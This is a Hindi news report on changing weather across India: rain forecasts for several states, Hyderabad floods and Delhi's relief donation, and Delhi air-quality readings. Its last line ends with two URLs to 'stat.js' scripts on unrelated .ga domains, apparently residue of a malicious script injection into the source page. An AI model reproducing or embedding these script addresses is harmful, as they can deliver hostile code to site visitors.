मौसम ने अपना रुख बदलना शुरू कर दिया है। कुछ दिनों से बंगाल की खाड़ी में समुद्री तूफान आ रहे हैं जिसके कारण अलग-अलग क्षेत्र में मौसम परिवर्तन हो रहा है। कई राज्यों में तो भारी बारिश भी हो रही है। आपको बता दें, 20 अक्टूबर यानी कि आज उत्तर प्रदेश बिहार और झारखंड में बारिश होने की संभावना जताई जा रही है।
मौसम बदल रहा है लेकिन दिल्ली में हल्की हवा के साथ सुबह का मौसम ठंडा और सुखद था। आपको बता दें, हैदराबाद में मौसम विज्ञान विभाग द्वारा बुधवार तक के लिए बारिश का अलर्ट जारी किया गया है। साथ ही यह भी चेतावनी दी गई है कि बिजली गिरने और गर्ल्स के साथ आंधी तूफान आने की भी अंदेशा है।
दिल्ली के मुख्यमंत्री अरविंद केजरीवाल ने कहा कि हैदराबाद में बाढ़ ने तबाही मचाई हुई है| राहत के लिए दिल्ली सरकार तेलंगाना सरकार को 15 करोड़ रुपये दान करेगी| केंद्रीय प्रदूषण नियंत्रण बोर्ड के अनुसार आईटीओ क्षेत्र में पीएम 10 का स्तर 178 और पीएम 2.5 का स्तर 129 रिकॉर्ड किया गया|
मौसम बदलने से बिहार में भी आंशिक बदलाव देखने को मिल रहे हैं। यहां न्यूनतम पारा गिरा है और अधिकतम तापमान में बढ़ोतरी हुई है। संभावित सिस्टम के कारण झारखंड और बिहार में भी 22 से 24 अक्टूबर के बीच हल्की से मध्यम वर्षा हो सकती है| हालांकि उत्तरी छत्तीसगढ़ और मध्य प्रदेश पर इसका प्रभाव नहीं नजर आएगा|https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms